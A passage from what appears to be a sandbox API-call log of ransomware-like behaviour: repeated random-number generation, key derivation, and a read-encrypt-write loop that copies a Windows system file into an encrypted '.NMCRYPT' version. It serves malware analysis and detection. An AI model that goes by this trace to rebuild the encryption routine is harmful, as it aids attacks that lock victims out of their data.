pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.961] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0168.961] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0168.962] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0168.962] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.962] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad878) returned 1 [0168.962] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0168.962] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0168.962] wcslen (_String="\\\\?\\") returned 0x4 [0168.962] CryptDuplicateKey (in: hKey=0x9ad878, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad278) returned 1 [0168.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0168.963] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0168.963] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=14848) returned 1 [0168.963] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0168.964] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.965] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.965] GetLastError () returned 0x0 [0168.965] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.087] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.088] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.088] GetLastError () returned 0x0 [0169.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.088] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.088] GetLastError () returned 0x0 [0169.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.088] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.088] GetLastError () returned 0x0 [0169.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.088] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.088] GetLastError () returned 0x0 [0169.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.088] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.088] GetLastError () returned 0x0 [0169.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.088] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.088] GetLastError () returned 0x0 [0169.088] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.088] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.089] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.089] GetLastError () returned 0x0 [0169.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.089] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.089] GetLastError () returned 0x0 [0169.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.089] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.089] GetLastError () returned 0x0 [0169.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.089] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.089] GetLastError () returned 0x0 [0169.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.089] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.089] GetLastError () returned 0x0 [0169.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.089] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.089] GetLastError () returned 0x0 [0169.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.089] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.089] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.089] GetLastError () returned 0x0 [0169.089] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.090] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.090] GetLastError () returned 0x0 [0169.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.090] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.090] GetLastError () returned 0x0 [0169.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.090] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.090] GetLastError () returned 0x0 [0169.090] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.090] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.090] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, 